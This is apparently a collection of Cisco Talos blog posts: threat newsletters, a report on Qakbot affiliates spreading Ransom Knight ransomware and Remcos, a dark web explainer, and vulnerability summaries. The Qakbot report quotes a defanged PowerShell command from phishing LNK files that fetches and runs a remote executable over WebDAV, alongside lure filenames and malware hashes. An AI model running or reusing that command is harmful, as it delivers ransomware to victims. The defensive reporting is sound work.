Plus, Qakbot appears to be still active, despite efforts from the FBI and other international law enforcement agencies to disrupt the massive botnet.

Thursday, October 5, 2023 14:10

Welcome to this week’s edition of the Threat Source newsletter.

It’s Cybersecurity Awareness Month, which means it’s time to hug your nearest defender — they’re probably tired, could be facing burnout or just have had too much coffee today.

What makes the cybersecurity landscape even more fraught right now is that qualified analysts, researchers and security practitioners are having a hard time finding work. Several major security firms have recently experienced layoffs or have shut down entirely, at the same time the community is lamenting about a cybersecurity skills gap and a lack of workers.

I was watching TechCrunch’s “Disrupt” conference last week and I found it interesting that one particular panel was discussing the challenges of hiring in cybersecurity right now, and the host of the panel asked if there is a stigma around hiring workers who had been a part of major breaches or security incidents (think: a SolarWinds employee who may have been working there during the major supply chain attack that targeted their software).

I had no idea this was even a going concern among security hiring managers, and it makes no sense why there would be. So, I started looking through job board postings and security forums and found that many active security job hunters are afraid to list if they worked somewhere during a notable incident. For example, this user on r/cybersecurity asked last year if they should leave a job off their résumé if they worked there when a major data breach occurred, even though they were not directly involved in the breach whatsoever.

And even if they were, who cares?

Sherrod DeGrippo, the director of threat intelligence strategy at Microsoft, had the perfect answer for this on the aforementioned TechCrunch panel. She said that if she sees a prospective employee who worked somewhere during a security “trash fire,” she looks "at that as somebody who has been on the frontlines and been under fire. They know what to do and they've been through it, and I guarantee they have learned from it.”

There has always been a stigma around disclosing data breaches for companies and employees alike, with targets being afraid of negative press or scrutiny that comes from publicly admitting to a data breach or cyber attack.

And I can see why someone wouldn’t want to mention that during a job interview. There could be an inherent “stink” that comes from working somewhere that got owned or had a ton of negative headlines around it, but I feel like that’s a stigma that needs to go away immediately if the security community does have any hope of closing the skills gap.

Anyone who’s been through a major security event, as I know firsthand from talking to many of Talos’ incident responders, always has something to learn — from either a positive or negative experience. It’s the same in every field, too.

When I was a journalist, I can’t say that I never had to issue a correction for a story I wrote or apologize to a source for misquoting them. They were mistakes I had to make as a young professional and learn from. And in this job, I’ve made a fair share of mistakes, too, and probably will make more. The important thing is, that I learn from those mistakes and make changes to my processes going forward to avoid those mistakes.

I would imagine the same would be for any engineer who mistakenly left a vulnerability in some code or downloaded that software update that seemed legitimate but actually was packed with malware.

If you’ve worked in security for long enough, no matter for what company, you’ve been involved in a major security incident. That should not deter someone from hiring you for your next job, and you shouldn’t be leaving this off a résumé.

I am curious to know if this is a real issue or stigma that’s out there, so if you’re a hiring manager or job applicant who’s experienced this, DM us on Twitter!

**The one big thing**

Qakbot appears to be still active, despite efforts from the FBI and other international law enforcement agencies to disrupt the massive botnet. Talos researchers discovered that the threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails. Notably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has been ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command and control (C2) servers.

**Why do I care?**

Qakbot is one of the largest, most notable malware networks on the landscape currently, so any activity from this group is notable. But it’s particularly noteworthy now that the actor was able to recover so quickly after the FBI’s efforts. This group is still actively sending spam, despite what recent headlines may indicate. Though Talos has not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we assess the malware will continue to pose a significant threat moving forward.

**So now what?**

Given that Qakbot’s operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity, so it’s important to monitor the Talos blog and other security research for any additional activity. Talos has new ClamAV signatures that can detect the malware associated with this current campaign, and there is a list of IOCs at the end of our blog post everyone should be adding to their blocklists or other detection.

**Top security headlines of the week**

**The company that manages the MOVEit file transfer software disclosed several vulnerabilities in one of its other products.** Progress Software, the makers of MOVEit, which was the subject of a large data breach responsible for dozens of follow-on attacks, urged users to patch WS\_FTP Server immediately. CVE-2023-40044 is a deserialization vulnerability in the Ad Hoc Transfer module in WS\_FTP Server that an attacker could exploit without authentication to execute remote code. In all, the company disclosed eight vulnerabilities last week and released hotfixes for all versions of the software. According to the company’s website, WS\_FTP Server offers “the unique business-grade features required to assure reliable and secure transfer of critical data.” The site lists several major customers who use the affected software, including the NFL’s Denver Broncos and clothing retailer H&M. (The Record by Recorded Future, Decipher)

**Google and Yahoo are implementing new rules around bulk email sending designed to reduce the amount of spam users receive and encourage more users to report spam.** Starting in early 2024, anyone sending more than 5,000 messages a day, will need to authenticate all messages using current authentication protocols like SPF or DKIM. All these emails must also offer a one-click unsubscribe option for recipients (so hopefully no more confusing “Are you sure you want to go?!” messages on email preference pages). In its announcement, Google says its current AI-based spam filters block 99.9 percent of spam emails. However, it’s become increasingly difficult as attackers have developed new methods of bypassing traditional blocking methods or create more convincing spam emails. (The Verge, ZDNet)

**The U.S. Department of Homeland Security is investigating if any floorplans for U.S. government buildings or other physical security information were affected by a data breach at a large government contractor.** Johnson Controls International, which manufacturers security systems and other hardware important to physical offices, disclosed this week that they are actively investigating a cyber attack "to assess what information was impacted" and is "executing our incident management and protection plan." An internal DHS memo that CNN obtained stated that “Until further notice, we should assume that \[the contractor\] stores DHS floor plans and security information tied to contracts on their servers.” At the time of the memo, DHS was concerned about the possibility about a government shutdown in the U.S. that could delay research, however, Congress avoided a shutdown over the weekend by passing a temporary spending bill. (CNN, Axios)

**Can’t get enough Talos?**

*   The Need to Know: What is the dark web?
*   Threat Roundup for Sept. 22 - 29
*   Talos Takes Ep. #156: Inside a Talos Incident Response emergency event
*   Cisco Cybersecurity Awareness Month homepage

**Upcoming events where you can find Talos**

**Bsides PDX** **(Oct. 6 - 7)**

Portland State University, Oregon, U.S.

**Cisco Cybersecurity Day** **(Oct. 11)**

Nuremberg Exhibition Center, Germany

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> _Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

**misecCON** **(Nov. 17)**

Lansing, Michigan

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa  
**MD5:** 9403425a34e0c78a919681a09e5c16da  
**Typical Filename:** vincpsarzh.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa  
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27  
**Typical Filename:** профиль 10 класс.exe  
**Claimed Product:** N/A  
**Detection Name:** Application\_Blocker

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

Is it bad to have a major security incident on your résumé? (Seriously I don’t know)

The threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails.

Thursday, October 5, 2023 07:10

*   The threat actors behind the Qakbot malware have been conducting a campaign since early August 2023 in which they have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails.
*   Notably, this activity appeared to begin before the FBI seized Qakbot infrastructure in late August and has been ongoing since, indicating the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command and control (C2) servers.
*   Talos attributed this new campaign to Qakbot affiliates as the metadata found in LNK files used in this campaign matches the metadata from machines used in previous Qakbot campaigns “AA” and ”BB.”
*   Though we have not seen the threat actors distributing Qakbot itself post-infrastructure takedown, we assess the malware will  continue to pose a significant threat moving forward. We see this as likely as the developers were not arrested and are still operational, opening the possibility that they may choose to rebuild the Qakbot infrastructure.

In a late August 2023 operation involving the FBI and many international partners, law enforcement agencies seized the infrastructure and cryptocurrency assets used by the Qakbot malware, dealing considerable damage to the group’s operations. Many people in the security industry wondered whether this would mean that the Qakbot affiliates were gone forever or just temporarily out of work while rebuilding their infrastructure.

Talos assesses with moderate confidence that the threat actors behind Qakbot are still active and have been conducting a new campaign that started just before the takedown, distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor. We tracked this new activity by connecting the metadata in the LNK files used in the new campaign to the machines used in previous Qakbot campaigns.

In January 2023, we wrote a blog post on using metadata from LNK files to identify and track threat actors. We specifically detailed how one machine used in the “AA” campaign with a drive serial number of “0x2848e8a8” was later used in a campaign for the new botnet named **“**BB**”.** After our blog’s publication, primary Qakbot actors responsible for the  **“**AA”, “BB**”,** and **“**Obama**”** campaigns started to wipe out the metadata in their LNK files to make detection and tracking harder.

Talos identified new LNK files in August 2023 that were created on the same machine referenced above, but observed that the payload of the files pointed to a network share in the command line that served a variant of Ransom Knight ransomware. Further analysis of the files revealed they point to Powershell.exe and pass the following arguments to download the next stage:

_**\-c "explorer '\\\\89\[.\]23\[.\]96\[.\]203@80\\333\\'"; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\\\89\[.\]23\[.\]96\[.\]203@80\\333\\information.exe**_

The command above opens Explorer.exe and attempts to access a remote network share on IP 89\[.\]23\[.\]96\[.\]203 using WebDAV on port 80. This method could be an attempt to bypass command line detection for downloading of a remote executable via PowerShell (T1105 Ingress Tool Transfer).

The filenames of these LNK files, with themes of urgent financial matters, suggest they are being distributed in phishing emails, which is consistent with previous Qakbot campaigns:

*   ATTENTION-Invoice-29-August.docx.lnk
*   bank transfer request.lnk
*   Booking info.pdf.lnk
*   Fattura NON pagata Agosto 2023.docx.lnk
*   FRAUD bank transfer report.pdf.lnk
*   invoice OTP bank.pdf.lnk
*   MANDATORY-Invoice-28-August.docx.lnk
*   NOT-paid-Invoice-26-August.pdf.lnk
*   Nuove coordinate bancarie e IBAN 2023.docx.lnk
*   Nuove coordinate bancarie e IBAN 2023.img.lnk
*   Pay-Invoices-29-August.pdf.lnk
*   URGENT-Invoice-27-August.docx.lnk

Some of the filenames are written in Italian, which suggests the threat actors may be targeting users in that region. The LNK files are being distributed inside Zip archives that also contain an XLL file. XLL is an extension used for Excel add-ins, and comes with an icon similar to other Excel file formats:

_Zip content for one of the phishing attachments._

According to our analysis, these XLL files are the Remcos backdoor which is executed along with Ransom Knight to give the threat actors access to the machine after the infection:

_VirusTotal information for XLL_ _file distributed along Ransom Knight LNK downloader._

The LNK file, on the other hand, downloads an executable file from remote IP 89\[.\]23\[.\]96\[.\]203 shown in the command line above via WebDAV, which is the actual Ransom Knight payload. This ransomware family is an updated version of the Cyclops ransomware-as-a-service, rewritten from scratch. The threat actor behind the Cyclops service announced the new variant in May 2023:

_Dark web forum post announcing Ransom Knight ransomware._

We do not believe the Qakbot threat actors are behind the ransomware-as-a-service offer, but are simply customers of the service. As this new operation has been ongoing since the beginning of August 2023 and has not stopped after the takedown, we believe the FBI operation didn’t affect Qakbot’s phishing email delivery infrastructure but only its command and control servers. Though we have not seen the threat actors distributing Qakbot post-infrastructure takedown, we assess the malware will likely continue to pose a significant threat moving forward. Given the operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity.

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

ClamAV detections are available for this threat:  
Lnk.Downloader.Qakbot  
Win.Ransomware.Knight  
Win.Backdoor.Remcos

**IOCs**

Indicators of Compromise associated with this threat can be found here

Qakbot-affiliated actors distribute Ransom Night malware despite infrastructure takedown

What is the dark web, and how is it different from the deep web?

Wednesday, October 4, 2023 08:10

Most users interact with the internet through the web, and many of the threat actors we write about operate on the “dark web.” Broadly speaking, the dark web is a small portion of the “deep web,” where the deep web represents most of the Web.

We know, it’s confusing — let’s walk through an example.

The surface web is what you get to see when using your favorite search engine. You can search for banks, and you will find (most likely) the website of your local bank. The results will include publicly accessible information about services they offer, their address or hours of operation.

The iceberg of the deep web

Then, there is a part of this web page you are only able to see after you log in. Your name, address, transactions and account balance. This is an example of the deep web. That is, information with restricted access (for good reason).

If a breach occurs, and this information is sold by an adversary, it will show up on the dark web. The dark web is intentionally hidden and just accessible by specific anonymizing software like Tor (The Onion Router), I2P (Invisible Internet Project), Freenet or ZeroNet. It is important to note that these technologies were/are developed for good, but criminals abuse them.

From torproject.org:

> _“Our mission: To advance human rights and freedoms by creating and deploying free and open-source anonymity and privacy technologies, supporting their unrestricted availability and use, and furthering their scientific and popular understanding.”_

The easiest or most common way for a user to access the Tor Network is using the Tor Browser, an application based on Mozilla Firefox, but configured to route all traffic through the Tor Network, thereby enhancing users’ privacy and anonymity.

Tor works by sending traffic through three random relays in the Tor network. The last relay (exit relay) then sends the traffic out onto the public internet.

Firefox exposing a user’s real IP address.

Tor browser through the Tor network.

Tor also offers host services. Those webpages are then accessible by a .onion TLD, just inside the Tor network.

.onion not available.

onion available within Tor network.

An example service is shown above. Torch is a search engine in and for the Tor network. Other examples are the BBC or New York Times, which make their pages available on Tor to thwart censorship.

The anonymity for consumers and publishers is interesting for adversaries, as it provides an additional layer of obfuscation which makes it harder for law enforcement agencies to track down transactions to a physical location. That’s why there are marketplaces and forums hosted for content such as malware, stolen credentials and alike, which are monitored by our teams.

While Tor provides a high level of anonymity and privacy, there are certain aspects of online activity that Tor does not fully protect against.

Individuals requiring an even higher-level privacy and security, or the need to pass non-HTTP traffic through the Tor network should look at Tails, The Amnesic Incognito Live System and its supporting documentation.

If you’d like to continue to learn more about the basics of the topics we cover on the Talos blog, read the rest of our entries in The Need to Know series.

What is the dark web?

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 22 and Sept. 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for September 22 to September 29

Two notable vulnerabilities in Google Chrome should be patched asap, and an allegedly new ransomware-as-a-service group.

Thursday, September 28, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

Since Elon Musk first started talking about purchasing Twitter/X around this time last year, one of his main sticking points has been how many bot accounts are on the platform and how that potentially affects advertising revenue and user counts.

In the latest advancement in the alleged fight against bots, X recently launched a government ID-based authentication process available to its paid premium users. The social media platform is partnering with a third-party security company to provide advanced, faster support to make it more difficult for others to impersonate the user.

The setup process says it involves the user taking a picture with their computer’s camera with their government-issued ID. According to X’s Verification Policy, the third-party company only keeps the provided picture for as long as it takes to verify the provided information, and any ID images are only kept for 72 hours. The information derived from the submitted pictures is stored for 30 days by the third party in the name of providing users “an opportunity to appeal a verification decision and for X to review your appeal.”

Meta, Facebook and Instagram’s parent company, has been rolling out a similar program called Meta Verified that also asks users to submit photos of a government ID and pay a subscription fee to receive “account verification with impersonation protections and access to increased visibility and support.”

Taken at face value, X and Meta’s retention policies for these provided images of IDs seem fine. The main issue for me is I don’t really see what the concrete benefits here are.

On X, submitting the ID information and paying for the premium subscription only says it provides faster support, and an additional verification badge on a user’s account along with the now-infamous blue checkmark. The option is not available to business or organizational accounts, which seems like it’d be the space most ripe for impersonation — I’ve certainly observed my fair share of Talos-impersonated accounts on that platform where someone tried passing as our organization.

X is also saying it will only look into future benefits for this verification program, which “may explore additional measures, such as ensuring users have access to age-appropriate content and protecting against spam and malicious accounts.” The service still isn’t offered in the EU and U.K., either, presumably because of the stricter data privacy laws in those regions.

When these verification procedures are in place, there’s no guarantee they work, either. My sister-in-law had her Instagram/Meta account taken over by a cryptocurrency spammer last year, and even when she submitted a 360-degree selfie and images of her government-issued ID to Instagram, they denied her claim that her account was hacked, and to this day it’s still sending cryptocurrency spam to her family members even though she’s created a new account. Her appeal was not accepted by the company, either.

That’s one very specific case, I know, but if I’m going to start sending these companies with dubious security histories pictures of my driver’s license, I’m going to need a bit more than promises of future features and vague support promises before I’m sold on this method of multi-factor authentication.

**The one big thing**

Google Chrome users should update their browsers as soon as possible after the company disclosed multiple, serious vulnerabilities. Google initially disclosed CVE-2023-4863 as a heap buffer overflow in the WebP image format in Chrome. However, on Wednesday, it released a new advisory with CVE-2023-5129 identifying that the vulnerability actually existed in libwebp, meaning it affects multiple applications and not just Chrome. The updated advisory also elevated the severity score to a maximum 10 out of 10. This week, Talos also disclosed CVE-2023-3421, a use-after-free vulnerability that affects Chrome. An attacker could exploit this vulnerability by tricking the target into visiting a specially crafted HTML web page.

**Why do I care?**

Chrome is a very popular web browser, and its Chromium open-source version serves as the basis for many other browsing software. The fact that critical WebP vulnerability is particularly notable because WebP is the new default file format that most images use when  processed in Chrome. According to the advisory, “With a specially crafted WebP lossless file, libwebp may write data out of bounds to the heap,” if an attacker exploits CVE-2023-5129.

**So now what?**

The advice here is pretty simple — update your Google Chrome if you haven’t already!

**Top security headlines of the week**

**MGM casinos went back online last week after 10 days** due to a ransomware attack. The company’s casinos and hotels were able to fix all issues pertaining to guest services and the electronic slot machines that had been taken down due to the attack. One estimate suggests the outage may have cost the company upward of $80 million. The Scattered Spider threat actor is taking credit for the attack, partnering with known ransomware magnate ALPHV. Security researchers believe Scattered Spider is actually a hacking group that calls itself Star Fraud. New research presented at LABScon last week also stated that the group infiltrated MGM and Caesars, another casino manager, after gaining access to Okta authentication servers. (Washington Post, Associated Press)

**A hacking group claims to have breached “all of Sony \[SIC\] Systems”** and is reportedly selling stolen data on the dark web. A new group called Ransomed.vc is taking credit for the alleged attack and says it accessed more than 6,000 files from the tech giant known for producing the PlayStation video game console. Sony says it is still investigating the group’s claims. Despite the name, Ransomed.vc is actually an extortion group and does not have its own encryptor. Instead, it plans to sell the data on the dark web for $2.5 million. However, other threat actors have since stepped up to also take credit for the attack, leaving exact attribution in doubt. Another threat actor calling themselves MajorNelson says they “leaked for free" a 2.4 GB compressed archive that contains 3.14 GB of uncompressed data it claims belongs to Sony. (Bleeping Computer, Kotaku)

**A new ransomware-as-a-service syndicate ShadowSyndicate is reportedly operating a massive network of servers** that’s connected to other large ransomware families. Security researchers say the group has potential ties to the ALPHV ransomware group and other ransomware families like Clop, Play, Royal and Cactus. A new report outlines dozens of systems that ShadowSyndicate controls, including 52 containing the group’s secure shell (SSH) fingerprint it uses as Cobalt Strike beacons to manage and coordinate its various malware campaigns. It’s currently unclear if ShadowSyndicate is truly a ransomware-as-a-service group or more of an initial access broker. (DarkReading, SC Magazine)

**Can’t get enough Talos?**

*   Talos Takes Ep. #155: How Talos helped defend BlackHat's network in Vegas
*   Beers with Talos Ep. #139: Who is Jacques Wagon?
*   Decipher Security Podcast Source Code 9/22
*   ICS protocol coverage using Snort 3 service inspectors
*   10 new vulnerabilities disclosed by Talos, including use-after-free issue in Google Chrome

**Upcoming events where you can find Talos**

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> _Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking._

**misecCON** **(Nov. 17)**

Lansing, Michigan

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** e2cdf48bc6741afd7aba54d7c0b30401d2d6dd06138979ca73f3167915bf22b3  
**MD5:** eba4ad9540713d5956ab0b6a566c1487  
**Typical Filename:** webnavigatorbrowser.exe  
**Claimed Product:** WebNavigatorBrowser  
**Detection Name:** Win64:WebNav.26k0.rlsync.Talos

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647  
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790  
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::1201

**SHA 256:** 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa  
**MD5:** e9a6b1346d1a2447cabb980f3cc5dd27  
**Typical Filename:** профиль 10 класс.exe  
**Claimed Product:** N/A  
**Detection Name:** Application\_Blocker

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

The security pitfalls of social media sites offering ID-based authentication

Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.

Wednesday, September 27, 2023 12:09

Cisco Talos disclosed 10 vulnerabilities over the past two weeks affecting a range of software, including the popular Google Chrome web browser.

Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.

Four of the vulnerabilities included in today’s Vulnerability Roundup that affect the Accusoft ImageGear development toolkit have a CVSS severity score of 9.8 out of a possible 10.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Use-after-free vulnerability in Google Chrome web browser**

TALOS-2023-1751 (CVE-2023-3421) is a use-after-free vulnerability that affects the Google Chrome web browser. An attacker could exploit this vulnerability by tricking the target into visiting a specially crafted HTML web page.

The vulnerability arises when an adversary manipulates a specific function in Chrome to cause an out-of-bounds heap memory access, which could lead to a heap use-after-free or heap overflow.

**Multiple vulnerabilities in Accusoft ImageGear**

Talos researchers recently discovered eight vulnerabilities in Accusoft ImageGear, a document-imaging developer toolkit that allows users to convert, edit and create images.

Three of the vulnerabilities — TALOS-2023-1802 (CVE-2023-32653), TALOS-2023-1830 (CVE-2023-39453) and TALOS-2023-1760 (CVE-2023-35002) are heap-based buffer overflow vulnerabilities that could allow an attacker to execute arbitrary code on the targeted machine. Another issue, TALOS-2023-1836 (CVE-2023-40163), also has a critical severity score of 9.8 out of 10, but in this case, a specially crafted file could lead to memory corruption.

TALOS-2023-1729 (CVE-2023-23567) can also lead to arbitrary code execution, though this vulnerability is considered less severe. An attacker could also exploit this vulnerability by supplying the target with a malformed file.

There are three other vulnerabilities Talos discovered in this software that could cause a heap-based buffer overflow condition or memory corruption if the attacker sends a specially crafted file to the target.

*   TALOS-2023-1750 (CVE-2023-32284)
*   TALOS-2023-1742 (CVE-2023-28393)
*   TALOS-2023-1749 (CVE-2023-32614)

Hancom Office is one of the most popular software packages in South Korea, offering word processing and other services similar to Microsoft Office 365.

Talos discovered a use-after-free vulnerability in HWord, the package’s word processing software. TALOS-2023-1759 (CVE-2023-32541) can be manipulated in a way that will eventually allow the attacker to execute arbitrary code if they trick the target into opening a specially crafted, malicious .doc file.

10 new vulnerabilities disclosed by Talos, including use-after-free issue in Google Chrome

Service inspectors are an evolution of Snort 2's preprocessors, providing access to additional built-in rules that look for protocol-level abnormalities.

ICS protocol coverage using Snort 3 service inspectors

It reads as if ALPHV really wants to come across as the “good guys” in this case, but I’m not sure who outside of dark web circles would be willing to feel sorry for them.

Thursday, September 21, 2023 14:09

Welcome to this week’s edition of the Threat Source newsletter.

As a former reporter, I’ve seen my fair share of press releases. But one from a threat actor was definitely a new one for me last week.

ALPHV (aka BlackCat) publicly took credit for a massive cyber attack against MGM, a resort, gambling and sports betting company best known for its massive casinos. The attack took down slot machines, guest reservation systems, and more belonging to MGM, and the company is still feeling the effects as of Tuesday.

And despite every major news outlet reporting on the incident, the actor wanted to take messaging into its own hands and “clarify” what happened exactly. Attackers have occasionally posted updates and pseudo-press releases in the past, but this particular press release on ALPHV’s leak site (don’t worry I didn’t actually link to their site) was peak unintentional comedy to me.

For starters, the actor blamed MGM for not using their official communication channels to contact them to start negotiating a ransom payment:

“As they were not responding to our emails with the special link provided (In order to prevent other IT Personnel from reading the chats) we could not actively identify if the user in the victim chat was authorized by MGM Leadership to be present,” the statement reads.

They also said that, hypothetically, if personally identifiable information \*had\* been stolen, they would allow the website Have I Been Pwned? to responsibly disclose this information, even though they stopped short of saying they stole PII.

Lastly, they took a victory lap by saying several news outlets had reported false information, claimed attribution too early, or made ALPHV seem too basic of a threat actor because the tactics, techniques and procedures “used by the people they blame for the attacks are known to the public and are relatively easy for anyone to imitate.”

The entire statement reads as someone who thinks they’ve done nothing wrong, and certainly written to intimate that the situation could have gone much more smoothly had MGM just reached out to the threat actor early on through what is deemed as the appropriate channels and negotiated early.

So, it makes me wonder what ALPHV thinks they’re gaining from all this? Part of me wonders if they were upset that public reporting had connected the attack to a group called “'Scattered Spider” and they wanted to make sure everyone knew who deserved the credit. Or it could have been that they wanted to turn up the heat on MGM representatives and apply public pressure to hopefully get them to communicate and settle on a ransom payment.

It reads as if ALPHV really wants to come across as the “good guys” in this case, but I’m not sure who outside of dark web circles would be willing to feel sorry for them.

**The one big thing**

Talos researchers recently discovered a new malware family we’re calling “HTTPSnoop” being deployed against telecommunications providers in the Middle East. HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint. We also discovered a sister implant to “HTTPSnoop” we’re naming “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. All these new tools are linked to a group we’re calling “ShroudedSnooper.”

**Why do I care?**

This activity is a continuation of a trend we have been monitoring over the last several years in which sophisticated actors are frequently targeting the telecommunications sector. This sector was consistently a top-targeted industry vertical in 2022, according to Cisco Talos Incident Response data. However, since this is a new, relatively unknown group, we can’t be certain that they’ll only stick to targeting this particular field. The various malware at their disposal can leave a backdoor on infected machines for future attacks and malware installations and execute arbitrary shellcode on the infected endpoint.

**So now what?**

We found specific URL patterns that make it look like the infected system being contacted is a server hosting Microsoft’s Exchange Web Services (EWS) API. The URLs consisted of “ews” and “autodiscover” keywords over Ports 443 and 444. The blog post has a list of these patterns so potentially affected targets can scan to see if they're infected. There is also a host of detection content available for Cisco Secure products.

**Top security headlines of the week**

**Apple released long-awaited updates to its “Lockdown Mode” with iOS 17 this week, its answer to a recent global uptick in spyware attacks.** Lockdown Mode now also works on Apple Watches, in addition to iPhones and iPads, which is notable because threat actors have increasingly started targeting Apple Watches with spyware. New features also remove geolocation information from photos when Lockdown Mode is enabled and automatically block insecure Wi-Fi networks. Apple and other cellphone manufacturers are working on addressing the use of cell site simulators, also known as “stingrays.” These fake cell base stations track phone locations and spy on calls and messages after a device connects to it. Google also announced new features earlier this year that ensure their devices’ communications are always encrypted when connecting to cell towers. (TechCrunch, Electronic Frontier Foundation)

**The U.S. Cybersecurity and Infrastructure Security Agency announced a new program offering free security scans to public water utilities and other critical infrastructure.** CISA is offering to run specialized scanners to identify a facility’s vulnerabilities and any weak configurations on internet-exposed endpoints. Then, they generate a report of any flaws or vulnerabilities found and send the plant a list of recommendations and offers for further scans to determine if the potential target has taken the appropriate steps to solve the issues. A brochure for the new program promises a “significant reduction in identified vulnerabilities in the first few months of scanning for newly enrolled water utilities.” (StateScoop, CISA)

